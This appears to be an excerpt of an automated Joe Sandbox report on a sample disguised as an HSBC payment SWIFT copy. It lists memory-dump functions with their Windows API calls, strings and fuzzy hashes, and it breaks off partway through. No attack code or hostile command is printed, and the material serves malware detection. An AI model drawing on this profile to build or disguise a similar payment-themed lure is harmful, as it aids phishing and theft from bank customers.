HKEY_CURRENT_CONFIG, xrefs: 007A0EEE
HKCR, xrefs: 007A0ED9
HKEY_CLASSES_ROOT, xrefs: 007A0EC4
HKEY_LOCAL_MACHINE, xrefs: 007A0E9A
HKLM, xrefs: 007A0EAF
HKEY_CURRENT_USER, xrefs: 007A0F10

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: eaa015e6107bd3b03ba7b8c8eedc193d0f4263eab3ef83ac85fd9d535fee38cc
Instruction ID: f4b45369f04b57d4fcd3270f9769855f35783ea942977c23b88b42d22a0613de
Opcode Fuzzy Hash: eaa015e6107bd3b03ba7b8c8eedc193d0f4263eab3ef83ac85fd9d535fee38cc
Instruction Fuzzy Hash: BC414C3124028ACFCF10EF10D869AEF3760AF52340F144965FD552B292DB3CA91ACBE0

Function 0077F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0075E2A0,00000010,?,Bad directive syntax error,007AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0077F7C2
LoadStringW.USER32(00000000,?,0075E2A0,00000010), ref: 0077F7C9

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

_wprintf.LIBCMT ref: 0077F7FC
__swprintf.LIBCMT ref: 0077F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0077F88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0077F7F7
., xrefs: 0077F873
Line %d (File "%s"):, xrefs: 0077F833
Line %d:, xrefs: 0077F818
Error: , xrefs: 0077F85B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 7d35c976d028baac3b509a90d67e8355e538a466c41cafc1ff5dee712f0b9d73
Instruction ID: 60a77c969bc0a8290b5b87f15423a7e36db2b8c70f62171bc7dce03e87ac5381
Opcode Fuzzy Hash: 7d35c976d028baac3b509a90d67e8355e538a466c41cafc1ff5dee712f0b9d73
Instruction Fuzzy Hash: DF21913294021EEBCF15EF90DD0AEEE7738BF14300F044866F509661A1EA79A658CB51

Function 007852C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

Part of subcall function 00727924: _memmove.LIBCMT ref: 007279AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00785330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00785346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00785357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00785369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0078537A

Strings

play PlayMe, xrefs: 00785375
status PlayMe mode, xrefs: 0078532B
close PlayMe, xrefs: 00785341, 0078536E
play PlayMe wait, xrefs: 00785364
alias PlayMe, xrefs: 00785309
open , xrefs: 007852DF

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: b5b275ebe38b0212829b58f983023fe7c67b323546ccfab0c76227b595f8f184
Instruction ID: f4bd5729be577af06b689cf22e342365bed3858d258ddd0d08e776c6ff600ff1
Opcode Fuzzy Hash: b5b275ebe38b0212829b58f983023fe7c67b323546ccfab0c76227b595f8f184
Instruction Fuzzy Hash: 2A11E770A90229BAD764BBB1DC4EDFF7B7CEBD2B54F00042AB401A21D1DEA85D44C6B1

Function 007846B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007846D2
gethostname.WSOCK32(?,00000100), ref: 007846EC
gethostbyname.WSOCK32(?), ref: 007846F9
_wcscpy.LIBCMT ref: 00784721
_memmove.LIBCMT ref: 00784734
inet_ntoa.WSOCK32(?), ref: 0078473F
_strcat.LIBCMT ref: 0078474D
_wcscpy.LIBCMT ref: 00784764
WSACleanup.WSOCK32 ref: 00784772
_wcscpy.LIBCMT ref: 00784780

Strings

0.0.0.0, xrefs: 0078471B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 3037400b4441e6b4181818bde9852f4af052d02aa44a75599ca74c675168af69
Instruction ID: 38e57b6f4f3896ff21450213e9938f9854f8cd4a976aa06cd1d274e084705319
Opcode Fuzzy Hash: 3037400b4441e6b4181818bde9852f4af052d02aa44a75599ca74c675168af69
Instruction Fuzzy Hash: 7411E731940115AFCB20BB709C4AEEA7BBCEF42711F4441BAF54596092EFBC99818B54

Function 00784F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00784F7A

Part of subcall function 0074049F: timeGetTime.WINMM(?,7694B400,00730E7B), ref: 007404A3

Sleep.KERNEL32(0000000A), ref: 00784FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00784FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00784FEC
SetActiveWindow.USER32 ref: 0078500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00785019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00785038
Sleep.KERNEL32(000000FA), ref: 00785043
IsWindow.USER32 ref: 0078504F
EndDialog.USER32(00000000), ref: 00785060

Strings

BUTTON, xrefs: 00784FDE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: bc60b1a659784be1cd91a491333127d025ab1d84cb765ffcefe3f373b4656ea1
Instruction ID: 2a36ae2e6e8625d9992f58f0fcfdae7e2b08b67e685eaba7506684503a8ea9d9
Opcode Fuzzy Hash: bc60b1a659784be1cd91a491333127d025ab1d84cb765ffcefe3f373b4656ea1
Instruction Fuzzy Hash: 8321C9B0741A45AFE7107F70ECC8A363BA9FB5E785F089028F102851B1DB7D4D208B69

Function 0078D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

CoInitialize.OLE32(00000000), ref: 0078D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0078D67D
SHGetDesktopFolder.SHELL32(?), ref: 0078D691
CoCreateInstance.OLE32(007B2D7C,00000000,00000001,007D8C1C,?), ref: 0078D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0078D74C
CoTaskMemFree.OLE32(?,?), ref: 0078D7A4
_memset.LIBCMT ref: 0078D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0078D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0078D840
CoTaskMemFree.OLE32(00000000), ref: 0078D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0078D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0078D880

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 3bde7af9405602dd8fbb15c458c1edfade2213abc112be436fe7e0d94cb5e109
Instruction ID: f354b3a084a5a2a79bb68b0f7117d0f4fcd8f2903478fb8d2889a93cab019635
Opcode Fuzzy Hash: 3bde7af9405602dd8fbb15c458c1edfade2213abc112be436fe7e0d94cb5e109
Instruction Fuzzy Hash: 0BB1F975A00119EFDB14EFA4C888DAEBBB9EF49314F148469E909EB261DB34ED41CB50

Function 0077C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0077C283
GetWindowRect.USER32(00000000,?), ref: 0077C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0077C2F3
GetDlgItem.USER32(?,00000002), ref: 0077C2FE
GetWindowRect.USER32(00000000,?), ref: 0077C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0077C364
GetDlgItem.USER32(?,000003E9), ref: 0077C372
GetWindowRect.USER32(00000000,?), ref: 0077C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0077C3C6
GetDlgItem.USER32(?,000003EA), ref: 0077C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0077C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0077C3FE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f8455f6724199763cdcb8e74a63850e82efbe0af8c7f747642b0e20ad30f2c5c
Instruction ID: 2c26e1a0b1bafeb2f57ee83cf7281a5a4659bd7bdfde3d7f830a451f4e3b249a
Opcode Fuzzy Hash: f8455f6724199763cdcb8e74a63850e82efbe0af8c7f747642b0e20ad30f2c5c
Instruction Fuzzy Hash: F7514D71B00205ABDF18CFA9DD89AAEBBBAEB89310F14C12DF51AD7290D7749D008B14

Function 0072201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00721B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00722036,?,00000000,?,?,?,?,007216CB,00000000,?), ref: 00721B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007220D3
KillTimer.USER32(-00000001,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0072216E
DestroyAcceleratorTable.USER32(00000000), ref: 0075BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0075BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0075BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0075BD0A
DeleteObject.GDI32(00000000), ref: 0075BD1C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: d8bce821dfe1c3479c015b8cc7cadfc47ac63a37d6e441a949938b4e756c6dc8
Instruction ID: 3c50ca46597c59ce806e9efeb8d505550acf82708197e1b1fc45f38dfb2b2aad
Opcode Fuzzy Hash: d8bce821dfe1c3479c015b8cc7cadfc47ac63a37d6e441a949938b4e756c6dc8
Instruction Fuzzy Hash: F461BE31101B64EFCB359F14E988B36B7F2FB45306F508528E9824A571C7BCE892DB94

Function 007221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007225DB: GetWindowLongW.USER32(?,000000EB), ref: 007225EC

GetSysColor.USER32(0000000F), ref: 007221D3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: fccdc59ec68c8e8b53f44bfda747c53017511692efc28f9cf2eb8fe0379673ee
Instruction ID: 25fc309e644f3f72ced77b23ae96a61d6585d415a0196fedccfe26b087ed8b1b
Opcode Fuzzy Hash: fccdc59ec68c8e8b53f44bfda747c53017511692efc28f9cf2eb8fe0379673ee
Instruction Fuzzy Hash: 6B41B131000154EBDB255F68EC88BB93BA5FB46331F298365FD659A1E2C73A8C43DB25

Function 0078A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,007AF910), ref: 0078A90B
GetDriveTypeW.KERNEL32(00000061,007D89A0,00000061), ref: 0078A9D5
_wcscpy.LIBCMT ref: 0078A9FF

Strings

ramdisk, xrefs: 0078A97F
unknown, xrefs: 0078A996
network, xrefs: 0078A969
all, xrefs: 0078A911
fixed, xrefs: 0078A953
removable, xrefs: 0078A93D
cdrom, xrefs: 0078A927

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: a9f08e5be9e768b75b3e6c266ff96a850adf16b4fe4c5b71663d2df632d783f7
Instruction ID: bea90216586850e3cfb3ec339e5c6603a552b1e5ec9c2b30697e09016009580d
Opcode Fuzzy Hash: a9f08e5be9e768b75b3e6c266ff96a850adf16b4fe4c5b71663d2df632d783f7
Instruction Fuzzy Hash: 9C51B031148301EBD304EF14D896AAFB7A9FF85310F14882EF595572A2DB39AD09CB93

Function 00729837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00729862
__swprintf.LIBCMT ref: 007298AC
__i64tow.LIBCMT ref: 0075F5E6

Strings

%.15g, xrefs: 007298A6
False, xrefs: 0075F5AE
True, xrefs: 0075F5A7
0x%p, xrefs: 0075F5C8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 6190f1a13d94379f0557f62a88b3d4b3deaa770c3e93efee14aaa9a4ab49e2c3
Instruction ID: 01520e7ecfd0cc8bc99b118d1fe4a6e3a7dd616ceeddb091c0cdf3b03d396010
Opcode Fuzzy Hash: 6190f1a13d94379f0557f62a88b3d4b3deaa770c3e93efee14aaa9a4ab49e2c3
Instruction Fuzzy Hash: 4B41B471A00215EFDB24DF34E846EBA77E8FF05300F28446EEA49D7292FA799945CB11

Function 007A7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A716A
CreateMenu.USER32 ref: 007A7185
SetMenu.USER32(?,00000000), ref: 007A7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A7221
IsMenu.USER32(?), ref: 007A7237
CreatePopupMenu.USER32 ref: 007A7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A726E
DrawMenuBar.USER32 ref: 007A7276

Strings

F, xrefs: 007A7262
0, xrefs: 007A7160

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: f68e53c23c0c8c92aa3bf3bb46f38a077d3a1d55cc8ada4b0e12a33fbcc40d65
Instruction ID: b2b98845b32b2fee95bcb0e58efb6712fd1d5f4dcd1f0657ed1882a6ebd80705
Opcode Fuzzy Hash: f68e53c23c0c8c92aa3bf3bb46f38a077d3a1d55cc8ada4b0e12a33fbcc40d65
Instruction Fuzzy Hash: 6A415674A01209EFDB24DFA4D884F9A7BB5FF8A310F144128F945A73A1D739A920CF94

Function 007A74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007A755E
CreateCompatibleDC.GDI32(00000000), ref: 007A7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007A7578
SelectObject.GDI32(00000000,00000000), ref: 007A7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 007A758B
DeleteDC.GDI32(00000000), ref: 007A7594
GetWindowLongW.USER32(?,000000EC), ref: 007A759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007A75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007A75BE

Strings

static, xrefs: 007A74F6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 73845025076e8b69fd3c1c1e333f9362f2e04828eb08e1c23656a1baa91629b8
Instruction ID: 354bd92b4f4697711fd15692107b14ae079ce31c698982c714e4005de00d97fb
Opcode Fuzzy Hash: 73845025076e8b69fd3c1c1e333f9362f2e04828eb08e1c23656a1baa91629b8
Instruction Fuzzy Hash: B4316C72504218EBDF159FA4DC08FDB3B69FF8A320F114324FA55960A0C739D821DBA8

Function 00746E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00746E3E

Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28

__gmtime64_s.LIBCMT ref: 00746ED7
__gmtime64_s.LIBCMT ref: 00746F0D
__gmtime64_s.LIBCMT ref: 00746F2A
__allrem.LIBCMT ref: 00746F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00746F9C
__allrem.LIBCMT ref: 00746FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00746FD1
__allrem.LIBCMT ref: 00746FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00747006
__invoke_watson.LIBCMT ref: 00747077

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 7ba7011a5dc15f1b61797f191c76a3cd6b52c1550a27acd42e137d63f056bc1e
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 39712676A00716EBD718AF68DC45BAAB3F8BF05364F108229F814D7291F778DD448B91

Function 00782527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00782542
GetMenuItemInfoW.USER32(007E5890,000000FF,00000000,00000030), ref: 007825A3
SetMenuItemInfoW.USER32(007E5890,00000004,00000000,00000030), ref: 007825D9
Sleep.KERNEL32(000001F4), ref: 007825EB
GetMenuItemCount.USER32(?), ref: 0078262F
GetMenuItemID.USER32(?,00000000), ref: 0078264B
GetMenuItemID.USER32(?,-00000001), ref: 00782675
GetMenuItemID.USER32(?,?), ref: 007826BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00782700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00782714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00782735

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

